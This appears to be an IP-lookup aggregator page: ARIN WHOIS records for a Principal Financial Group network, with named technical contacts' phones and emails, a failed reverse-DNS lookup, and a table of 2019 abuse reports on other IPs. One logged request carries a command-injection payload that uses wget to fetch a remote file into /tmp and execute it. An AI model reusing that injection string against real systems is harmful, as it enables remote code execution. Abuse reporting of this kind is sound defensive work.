City: unknown
Region: unknown
Country: United States
Internet Service Provider: unknown
Hostname: unknown
Organization: unknown
Usage Type: unknown
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/resources/registry/whois/tou/
#
# If you see inaccuracies in the results, please report at
# https://www.arin.net/resources/registry/whois/inaccuracy_reporting/
#
# Copyright 1997-2026, American Registry for Internet Numbers, Ltd.
#
NetRange: 162.131.0.0 - 162.131.255.255
CIDR: 162.131.0.0/16
NetName: USPRI101
NetHandle: NET-162-131-0-0-1
Parent: NET162 (NET-162-0-0-0-0)
NetType: Direct Allocation
OriginAS:
Organization: Principal Financial Group, Inc. (PFG-1)
RegDate: 1992-11-20
Updated: 2026-03-12
Comment: -----BEGIN CERTIFICATE-----MIIDizCCAnOgAwIBAgIUPJ/Sgwmr8PAe3MjRjYNug7NIbxswDQYJKoZIhvcNAQELBQAwVTELMAkGA1UEBhMCVVMxDTALBgNVBAgMBElvd2ExEzARBgNVBAcMCkRlcyBNb2luZXMxIjAgBgNVBAoMGVByaW5jaXBhbCBGaW5hbmNpYWwgR3JvdXAwHhcNMjYwMzEwMjIyNjE0WhcNMjYwOTA2MjIyNjE0WjBVMQswCQYDVQQGEwJVUzENMAsGA1UECAwESW93YTETMBEGA1UEBwwKRGVzIE1vaW5lczEiMCAGA1UECgwZUHJpbmNpcGFsIEZpbmFuY2lhbCBHcm91cDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBANTiK++2wmzPKvSVsB2sCI10JBy0XQyeEdDJM33WsXm9m6FsvWg+dEWXD1DN3b9Z/MgXTl1GwL02DYCcRNN6LDTIw3xBIO/R4g2H9krL2DGNIAodZTzpL3px/mDaHn5Fxx1TwEfU6R2XC+gCMoL8ZOIfpnH3e/t3xV+tYloCfoMwDbVK08p2FuUJC9njQA8ZosolkotRxrsRDLcyXBQx08N4heLMZjruVAH9uHaupKpWH7l6AmWjTDj29D+pYeFbhFwpCoM0byrjGT0KOr5Lzug3VGnBvgi+1jWMMBvjqk/s9w0TR4WDNALcXTcQKIPtVmiEumbt6Wp7lRGUkHZaeLMCAwEAAaNTMFEwHQYDVR0OBBYEFP270mwZfbw/HvhWyL/gqEUr+DpcMB8GA1UdIwQYMBaAFP270mwZfbw/HvhWyL/gqEUr+DpcMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAK/rZh0bpwwk+3zUcReNcZd8ISzYByJb85dxjsumEhUZgycCkFZDLcNZF5X6qX0yV3i1d+63GvsKxC2Tk789QvyDRNWTueiPhZDbcOmiRelseNf0ZyR5WsdAMKuxuH+H4P6hgHTP92Ay9tHiVnqXA7X7vc9iRQ3ONDqUSFQwCCQ+OGDJIAl63vB/wN4NkcvYdq67vsB/DYxjemGmATsFKTplTwBSTAP3mdmG0VUuVQpBtZ55ZgeXVfm8tmrGIrSqhQDD4oL7DONJQ6ASqiF93tRXrS/rnNCV3SQcepwzSmFZKifRKFno4k1C+tfW71fkFrzMbPHI8NnxDr6kf7l5dFQ=-----END CERTIFICATE-----
Ref: https://rdap.arin.net/registry/ip/162.131.0.0
OrgName: Principal Financial Group, Inc.
OrgId: PFG-1
Address: IS Network Administration
Address: 711 High Street
City: Des Moines
StateProv: IA
PostalCode: 50392
Country: US
RegDate: 1992-11-20
Updated: 2026-02-04
Ref: https://rdap.arin.net/registry/entity/PFG-1
OrgAbuseHandle: NSO31-ARIN
OrgAbuseName: Network Security Operations
OrgAbusePhone: +1-515-247-5047
OrgAbuseEmail: abuse@principal.com
OrgAbuseRef: https://rdap.arin.net/registry/entity/NSO31-ARIN
OrgTechHandle: STAFF127-ARIN
OrgTechName: Stafford, Mark
OrgTechPhone: +1-515-235-6268
OrgTechEmail: stafford.mark@principal.com
OrgTechRef: https://rdap.arin.net/registry/entity/STAFF127-ARIN
OrgTechHandle: LOFTU8-ARIN
OrgTechName: Loftus, Brad
OrgTechPhone: +1-515-247-5383
OrgTechEmail: loftus.brad@principal.com
OrgTechRef: https://rdap.arin.net/registry/entity/LOFTU8-ARIN
OrgTechHandle: EWEST-ARIN
OrgTechName: Ewest, Mark
OrgTechPhone: +1-515-207-9963
OrgTechEmail: ewest.mark@principal.com
OrgTechRef: https://rdap.arin.net/registry/entity/EWEST-ARIN
OrgTechHandle: DEUTM-ARIN
OrgTechName: Deutmeyer, Brian
OrgTechPhone: +1-515-207-9608
OrgTechEmail: deutmeyer.brian@principal.com
OrgTechRef: https://rdap.arin.net/registry/entity/DEUTM-ARIN
OrgTechHandle: WATNE1-ARIN
OrgTechName: Watne, Nate
OrgTechPhone: +1-515-246-7163
OrgTechEmail: watne.nathan@principal.com
OrgTechRef: https://rdap.arin.net/registry/entity/WATNE1-ARIN
RAbuseHandle: NSO31-ARIN
RAbuseName: Network Security Operations
RAbusePhone: +1-515-247-5047
RAbuseEmail: abuse@principal.com
RAbuseRef: https://rdap.arin.net/registry/entity/NSO31-ARIN
RTechHandle: DEUTM-ARIN
RTechName: Deutmeyer, Brian
RTechPhone: +1-515-207-9608
RTechEmail: deutmeyer.brian@principal.com
RTechRef: https://rdap.arin.net/registry/entity/DEUTM-ARIN
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/resources/registry/whois/tou/
#
# If you see inaccuracies in the results, please report at
# https://www.arin.net/resources/registry/whois/inaccuracy_reporting/
#
# Copyright 1997-2026, American Registry for Internet Numbers, Ltd.
#; <<>> DiG 9.10.3-P4-Ubuntu <<>> 162.131.32.42
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 39286
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;162.131.32.42. IN A
;; AUTHORITY SECTION:
. 30 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2026042002 1800 900 604800 86400
;; Query time: 9 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Tue Apr 21 13:40:16 CST 2026
;; MSG SIZE rcvd: 106Host 42.32.131.162.in-addr.arpa. not found: 3(NXDOMAIN)Server: 183.60.83.19
Address: 183.60.83.19#53
** server can't find 42.32.131.162.in-addr.arpa: NXDOMAIN| IP | Type | Details | Datetime |
|---|---|---|---|
| 157.119.227.103 | attackspambots | [21/Jul/2019:02:36:40 -0400] "GET / HTTP/1.1" Chrome 52.0 UA |
2019-07-23 06:59:15 |
| 183.131.82.99 | attackbots | Jul 23 01:32:59 MainVPS sshd[13761]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=183.131.82.99 user=root Jul 23 01:33:02 MainVPS sshd[13761]: Failed password for root from 183.131.82.99 port 63207 ssh2 Jul 23 01:33:09 MainVPS sshd[13772]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=183.131.82.99 user=root Jul 23 01:33:11 MainVPS sshd[13772]: Failed password for root from 183.131.82.99 port 61742 ssh2 Jul 23 01:33:18 MainVPS sshd[13784]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=183.131.82.99 user=root Jul 23 01:33:20 MainVPS sshd[13784]: Failed password for root from 183.131.82.99 port 10440 ssh2 ... |
2019-07-23 07:34:08 |
| 41.67.59.14 | attackbotsspam | 445/tcp 445/tcp 445/tcp... [2019-05-21/07-22]16pkt,1pt.(tcp) |
2019-07-23 07:02:23 |
| 185.176.27.54 | attackbots | Splunk® : port scan detected: Jul 22 19:29:00 testbed kernel: Firewall: *TCP_IN Blocked* IN=eth0 OUT= MAC=82:c6:52:d1:6e:53:c0:42:d0:39:2c:30:08:00 SRC=185.176.27.54 DST=104.248.11.191 LEN=40 TOS=0x00 PREC=0x00 TTL=245 ID=54128 PROTO=TCP SPT=52659 DPT=21900 WINDOW=1024 RES=0x00 SYN URGP=0 |
2019-07-23 07:37:19 |
| 3.112.132.25 | attackspam | Jul 22 13:08:53 localhost sshd\[28805\]: Invalid user user from 3.112.132.25 port 30156 Jul 22 13:08:53 localhost sshd\[28805\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=3.112.132.25 Jul 22 13:08:55 localhost sshd\[28805\]: Failed password for invalid user user from 3.112.132.25 port 30156 ssh2 ... |
2019-07-23 07:07:45 |
| 13.126.93.219 | attackspam | Jul 22 22:42:04 v22018076622670303 sshd\[29343\]: Invalid user edgar from 13.126.93.219 port 50738 Jul 22 22:42:04 v22018076622670303 sshd\[29343\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=13.126.93.219 Jul 22 22:42:06 v22018076622670303 sshd\[29343\]: Failed password for invalid user edgar from 13.126.93.219 port 50738 ssh2 ... |
2019-07-23 07:18:13 |
| 146.255.233.50 | attack | [21/Jul/2019:13:25:49 -0400] "GET / HTTP/1.1" Chrome 52.0 UA |
2019-07-23 07:04:54 |
| 181.98.111.219 | attackbotsspam | Unauthorised access (Jul 22) SRC=181.98.111.219 LEN=40 TTL=48 ID=36813 TCP DPT=23 WINDOW=43921 SYN |
2019-07-23 07:08:22 |
| 51.254.182.104 | attackbotsspam | Invalid user postgres from 51.254.182.104 port 56738 |
2019-07-23 07:11:13 |
| 103.57.43.174 | attackbots | Unauthorised access (Jul 22) SRC=103.57.43.174 LEN=40 TOS=0x08 PREC=0x20 TTL=46 ID=6898 TCP DPT=23 WINDOW=41793 SYN |
2019-07-23 07:23:36 |
| 45.13.39.126 | attackbotsspam | 2019-07-23T04:14:25.821185ns1.unifynetsol.net postfix/smtpd\[11671\]: warning: unknown\[45.13.39.126\]: SASL LOGIN authentication failed: authentication failure 2019-07-23T04:15:26.338524ns1.unifynetsol.net postfix/smtpd\[12496\]: warning: unknown\[45.13.39.126\]: SASL LOGIN authentication failed: authentication failure 2019-07-23T04:16:29.533593ns1.unifynetsol.net postfix/smtpd\[11671\]: warning: unknown\[45.13.39.126\]: SASL LOGIN authentication failed: authentication failure 2019-07-23T04:17:32.496194ns1.unifynetsol.net postfix/smtpd\[12496\]: warning: unknown\[45.13.39.126\]: SASL LOGIN authentication failed: authentication failure 2019-07-23T04:18:34.273440ns1.unifynetsol.net postfix/smtpd\[12496\]: warning: unknown\[45.13.39.126\]: SASL LOGIN authentication failed: authentication failure |
2019-07-23 07:05:33 |
| 129.213.160.35 | attack | /TP/public/index.php |
2019-07-23 07:34:23 |
| 89.100.21.40 | attack | Jul 22 16:03:03 OPSO sshd\[11524\]: Invalid user music from 89.100.21.40 port 40552 Jul 22 16:03:03 OPSO sshd\[11524\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.100.21.40 Jul 22 16:03:05 OPSO sshd\[11524\]: Failed password for invalid user music from 89.100.21.40 port 40552 ssh2 Jul 22 16:08:01 OPSO sshd\[12325\]: Invalid user louis from 89.100.21.40 port 36746 Jul 22 16:08:01 OPSO sshd\[12325\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.100.21.40 |
2019-07-23 07:03:05 |
| 79.54.147.42 | attackspambots | 79.54.147.42 - - [22/Jul/2019:15:09:02 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://206.189.170.165/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 166 "-" "ELEMENT/2.0" ... |
2019-07-23 07:05:15 |
| 221.148.45.168 | attackbotsspam | Automatic report - Banned IP Access |
2019-07-23 07:33:53 |